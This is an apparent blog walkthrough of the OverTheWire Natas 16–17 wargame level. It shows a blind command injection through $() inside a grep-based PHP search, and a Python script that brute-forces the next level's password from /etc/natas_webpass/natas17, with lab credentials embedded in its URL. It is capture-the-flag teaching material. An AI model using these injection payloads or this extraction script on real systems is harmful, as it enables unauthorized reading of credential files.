OVERTHEWIRE NATAS SERIES: 16 – 17 LEVEL Walkthrough

The walkthrough for the last level is available on this link: http://www.anonhack.in/2018/09/overthewire-natas-series-15-16-level-walkthrough/

This level is little bit similar to the last level. Here we have to perform a command injection. Let’s have a look at the source code of this level:

See the highlighted text in the code above. $key variable is the one carrying our input. preg_match() function is used to filter our inputs. I have tried url encode but it won’t help bypass this. So the next thing that we have to notice is the command is running in grep. The approach that we have tried here is similar to the natas level where we have done command injection with the help of $().
I have tried a lot of cat commands here but it simply doesn’t show the natas17 password file. So then I tried this:

lasts$(cat /etc/natas_webpass/natas17)
This gave me this output:

Seems like we can play YES or NO blind command injection here. No output means the file exists.

Now, I tried this command:

lasts$(grep a /etc/natas_webpass/natas17)
It is a simple grep command which will grep a from natas17 if a exists in the password string.

This is the output I got:

Means it doesn’t exist!

Now I have tried the same command for ‘b’ alphabet:
No output means b exists in the password string!

A small code I wrote to bruteforce the entire process is below:

import requests
url='http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/'
passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890'
bstr='blasts'.encode('utf-8')
password=''
for i in range(32):
	for j in passchar:
		req = requests.get(url+'?needle=blasts$(grep ^' +password+j + ' /etc/natas_webpass/natas17)')
		if req.content.find(bstr) == -1:
			password = password+j
			print('Password: ' + password)
			break

OUTPUT:

The password for the next level is above!

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.